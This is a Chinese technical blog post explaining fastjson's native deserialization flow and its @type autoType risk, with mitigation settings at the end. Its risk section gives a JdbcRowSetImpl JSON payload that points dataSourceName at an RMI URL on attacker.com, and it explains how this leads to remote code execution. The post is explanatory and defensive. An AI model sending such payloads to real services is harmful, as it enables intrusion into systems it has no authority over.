news 2026/4/16 15:27:44

fastjson 原生反序列化的底层原理和执行流程

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
fastjson 原生反序列化的底层原理和执行流程

一、fastjson 反序列化核心概念

首先明确基础定义:

  • 反序列化:将 JSON 字符串转换为 Java 对象的过程,fastjson 作为高性能 JSON 库,其反序列化核心是「基于字节码生成 + 反射」的混合实现。
  • 原生反序列化:指 fastjson 默认的反序列化方式(非ParserConfig.getGlobalInstance().setSafeMode(true)等安全模式),支持完整的类加载、属性注入和方法调用。

二、fastjson 原生反序列化核心流程

fastjson 反序列化的完整执行链路可分为 5 个核心步骤,我用流程图+文字拆解:

输入JSON字符串
JSON解析器初始化
语法解析与Token提取
类加载与实例化
属性注入与方法调用
返回最终Java对象
步骤1:JSON解析器初始化

fastjson 会创建DefaultJSONParser对象,核心参数包括:

  • JSON 字符串的字符数组
  • 配置类ParserConfig(决定是否允许加载自定义类、是否开启安全模式等)
  • 特征配置Feature(如是否允许单引号、是否忽略未知属性等)

核心代码示例:

// 手动初始化解析器(fastjson底层调用逻辑)Stringjson="{\"@type\":\"com.example.User\",\"name\":\"test\"}";ParserConfigconfig=ParserConfig.getGlobalInstance();// 默认全局配置DefaultJSONParserparser=newDefaultJSONParser(json,config,Feature.Default);
步骤2:语法解析与Token提取

DefaultJSONParser通过Lexer对 JSON 字符串进行词法分析,将字符串拆分为 Token(如{}@type、字符串值、数字值等),核心逻辑:

  1. 识别 JSON 结构(对象/数组/基本类型);
  2. 提取关键标识:尤其是@type字段(fastjson 反序列化的核心入口,指定要实例化的类名);
  3. 校验 JSON 语法合法性(如括号匹配、引号闭合等)。
步骤3:类加载与实例化

这是反序列化的核心环节,fastjson 会根据@type指定的类名(或默认类)完成类加载和对象创建:

  1. 类加载:通过ParserConfigcheckAutoType方法校验类名(原生模式下默认允许大部分类),然后通过Class.forName加载类;
  2. 对象实例化
    • 优先调用类的无参构造方法(如果没有无参构造且未指定 Creator,会抛出异常);
    • 支持通过@JSONCreator注解指定有参构造/静态工厂方法;
    • 对于集合/数组等容器类,会创建对应的空容器对象。

核心代码(简化版):

// 类加载逻辑(ParserConfig核心方法)publicClass<?>checkAutoType(StringtypeName,Class<?>expectClass,intfeatures){// 原生模式下跳过大部分安全校验Class<?>clazz=Class.forName(typeName,true,Thread.currentThread().getContextClassLoader());returnclazz;}// 对象实例化(JavaBeanDeserializer)publicObjectcreateInstance(DefaultJSONParserparser,Typetype){// 优先找无参构造Constructor<?>constructor=clazz.getDeclaredConstructor();constructor.setAccessible(true);returnconstructor.newInstance();}
步骤4:属性注入与方法调用

实例化对象后,fastjson 会遍历 JSON 中的键值对,完成属性赋值,核心逻辑:

  1. 属性匹配:将 JSON 的 key 与 Java 类的字段名/setter 方法匹配(支持驼峰/下划线自动转换);
  2. 类型转换:将 JSON 中的字符串/数字等值转换为 Java 字段的类型(如 String → Integer、JSON 对象 → 嵌套 Java 对象);
  3. 赋值方式
    • 优先调用setXxx()方法(符合 JavaBean 规范);
    • 如果没有 setter,直接通过反射设置字段值(field.setAccessible(true));
  4. 特殊方法调用
    • 对于实现java.io.Externalizable的类,会调用readExternal方法;
    • 对于自定义反序列化器(ObjectDeserializer),会调用其deserialze方法。
步骤5:返回最终对象

完成所有属性注入后,将实例化并赋值完成的 Java 对象返回,反序列化流程结束。

三、fastjson 反序列化关键组件

组件名作用
DefaultJSONParser核心解析器,负责 JSON 词法/语法分析
ParserConfig反序列化配置中心,控制类加载、自动类型检测、反序列化器注册等
JavaBeanDeserializer默认的 JavaBean 反序列化器,处理普通类的实例化和属性注入
Lexer词法分析器,将 JSON 字符串拆分为 Token
ObjectDeserializer反序列化器接口,自定义类可实现该接口定制反序列化逻辑

四、原生反序列化的核心风险(深度剖析重点)

fastjson 原生反序列化的最大问题在于@type字段的滥用,核心风险点:

  1. 任意类加载:原生模式下checkAutoType校验宽松,攻击者可通过@type指定危险类(如com.sun.rowset.JdbcRowSetImpl);
  2. 反射执行恶意代码:危险类实例化后,其属性注入过程会触发敏感方法(如JdbcRowSetImplsetDataSourceName会触发 JNDI 调用,进而加载远程恶意类);
  3. 无参构造触发风险:部分危险类的无参构造方法本身就会执行敏感逻辑(如文件写入、命令执行)。

典型恶意 JSON 示例:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://attacker.com/malicious.class","autoCommit":true}

执行流程:

  1. 加载JdbcRowSetImpl类 → 实例化(无参构造);
  2. 注入dataSourceName属性(调用setDataSourceName);
  3. 注入autoCommit属性(调用setAutoCommit,内部触发connect方法,访问 RMI 服务器加载恶意类);
  4. 恶意类执行命令,完成攻击。

五、fastjson 反序列化优化/安全配置

为了规避风险,实际使用中需调整配置:

  1. 开启安全模式:
    ParserConfig.getGlobalInstance().setSafeMode(true);
  2. 白名单控制:
    ParserConfigconfig=newParserConfig();config.addAccept("com.example.");// 只允许反序列化指定包下的类
  3. 禁用@type字段:
    DefaultJSONParserparser=newDefaultJSONParser(json,config,Feature.DisableSpecialKeyDetect);

总结

  1. fastjson 原生反序列化核心是「解析 JSON → 加载类 → 实例化对象 → 反射注入属性」,依赖ParserConfig控制类加载规则;
  2. @type字段是反序列化的核心入口,也是安全风险的主要来源,原生模式下校验宽松易导致任意代码执行;
  3. 生产环境必须开启安全模式/白名单,禁用不必要的@type解析,避免反序列化漏洞。
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/16 8:42:32

Java SpringBoot+Vue3+MyBatis 扶贫助农系统系统源码|前后端分离+MySQL数据库

摘要 在当今社会&#xff0c;扶贫助农是国家发展的重要战略之一&#xff0c;尤其在乡村振兴背景下&#xff0c;如何利用信息化技术提升扶贫工作的精准性和效率成为关键问题。传统的扶贫方式存在信息不对称、资源分配不均等问题&#xff0c;亟需通过数字化手段优化管理流程。基于…

作者头像 李华
网站建设 2026/4/16 10:14:06

HoRain云--HTTP报文详解:从请求到响应的全解析

&#x1f3ac; HoRain云小助手&#xff1a;个人主页 &#x1f525; 个人专栏: 《Linux 系列教程》《c语言教程》 ⛺️生活的理想&#xff0c;就是为了理想的生活! ⛳️ 推荐 前些天发现了一个超棒的服务器购买网站&#xff0c;性价比超高&#xff0c;大内存超划算&#xff01;…

作者头像 李华
网站建设 2026/4/16 10:16:28

LangFlow能否实现语音指令转文本处理流水线?

LangFlow能否实现语音指令转文本处理流水线&#xff1f; 在智能交互日益普及的今天&#xff0c;用户对“动口不动手”的期待正推动AI系统从纯文本输入向多模态感知演进。想象这样一个场景&#xff1a;你对着电脑说一句“帮我查一下昨天会议的纪要”&#xff0c;系统立刻识别语音…

作者头像 李华
网站建设 2026/4/16 10:20:14

二分查找与程序语义与循环不变量

二分查找 文章目录 二分查找基本的查找第一种 左闭右闭区间第二种写法 左闭右开区间 循环不变量接下来。。。 二分查找算法思路之简单&#xff0c;实现之复杂&#xff0c;是典型的现实世界问题&#xff0c;映射为计算机计算问题时&#xff0c;语义模拟不到位而导致错误的最典型…

作者头像 李华
网站建设 2026/4/16 10:13:39

2026年软件测试技术演进与变革趋势深度剖析

测试行业正处于智能化转型的关键拐点 随着数字化转型进入深水区&#xff0c;软件测试作为质量保障的核心环节&#xff0c;正经历从辅助支撑到驱动创新的角色转变。云计算、人工智能和敏捷方法论的综合影响&#xff0c;推动测试技术栈、工作流程和团队能力要求发生根本性变革。…

作者头像 李华
网站建设 2026/4/16 10:13:25

LangFlow能否实现多模态输入处理?图文混合流程构建

LangFlow能否实现多模态输入处理&#xff1f;图文混合流程构建 在AI应用日益复杂的今天&#xff0c;我们早已不再满足于让模型“读文字、写句子”。越来越多的场景要求系统能够“看图说话”——比如上传一张医疗报告图片&#xff0c;自动提取关键指标并生成解读&#xff1b;或…

作者头像 李华